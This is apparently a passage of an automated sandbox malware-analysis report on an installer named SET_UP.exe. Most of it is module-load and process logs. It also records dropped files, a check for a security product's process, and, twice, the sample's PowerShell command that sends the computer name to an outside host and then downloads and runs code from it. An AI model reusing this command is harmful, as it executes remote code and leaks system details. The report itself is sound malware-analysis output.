            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: sfc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: explorerframe.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: dlnashext.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: wpdshext.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
            Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
            Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
            Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
            Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wsock32.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: winmm.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: iconcodecservice.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: windowscodecs.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: textshaping.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: twinui.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wintypes.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: powrprof.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: dwmapi.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: pdh.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: umpdc.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: shdocvw.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpWindow found: window name: TMainFormJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: SET_UP.exeStatic file information: File size 76245722 > 1048576
            Source: SET_UP.exeStatic PE information: section name: RT_CURSOR
            Source: SET_UP.exeStatic PE information: section name: RT_BITMAP
            Source: SET_UP.exeStatic PE information: section name: RT_ICON
            Source: SET_UP.exeStatic PE information: section name: RT_MENU
            Source: SET_UP.exeStatic PE information: section name: RT_DIALOG
            Source: SET_UP.exeStatic PE information: section name: RT_STRING
            Source: SET_UP.exeStatic PE information: section name: RT_ACCELERATOR
            Source: SET_UP.exeStatic PE information: section name: RT_GROUP_ICON

            Data Obfuscation

            barindex
            Suspicious powershell command line found
            Source: C:\Users\user\Desktop\SET_UP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{
            Source: C:\Users\user\Desktop\SET_UP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{Jump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004B518C GetModuleHandleA,LoadLibraryA,GetProcAddress,#17,#17,FreeLibrary,0_2_004B518C
            Source: LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe.0.drStatic PE information: real checksum: 0x9307ce should be: 0x8615ed
            Source: LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp.8.drStatic PE information: real checksum: 0x33908a should be: 0x33af29
            Source: LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp.6.drStatic PE information: real checksum: 0x33908a should be: 0x33af29
            Source: LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe.0.drStatic PE information: section name: .didata
            Source: LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp.6.drStatic PE information: section name: .didata
            Source: LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp.8.drStatic PE information: section name: .didata
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exeFile created: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpFile created: C:\Users\user\AppData\Local\Temp\is-DQ6NK.tmp\_isetup\_setup64.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpFile created: C:\Users\user\AppData\Local\Temp\is-DQ6NK.tmp\_isetup\_isdecmp.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpFile created: C:\Users\user\AppData\Local\Temp\is-K2ISP.tmp\_isetup\_setup64.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpFile created: C:\Users\user\AppData\Local\Temp\is-K2ISP.tmp\_isetup\_isdecmp.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exeFile created: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpJump to dropped file
            Source: C:\Users\user\Desktop\SET_UP.exeFile created: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLib\is-FCQ2K.tmpJump to dropped file
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004AC4C0 CallWindowProcA,DefWindowProcA,IsIconic,SendMessageA,GetWindowLongA,GetWindowLongA,GetWindowDC,GetWindowRect,InflateRect,InflateRect,SelectObject,OffsetRect,SelectObject,ReleaseDC,0_2_004AC4C0
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004ACC70 GetPropA,CallWindowProcA,CallWindowProcA,IsIconic,CallWindowProcA,GetWindowLongA,SendMessageA,CallWindowProcA,CallWindowProcA,GetWindowLongA,GetClassNameA,lstrcmpA,CallWindowProcA,GetWindowLongA,CallWindowProcA,CallWindowProcA,CallWindowProcA,0_2_004ACC70
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00495BF2 IsIconic,GetWindowPlacement,GetWindowRect,0_2_00495BF2
            Source: C:\Users\user\Desktop\SET_UP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
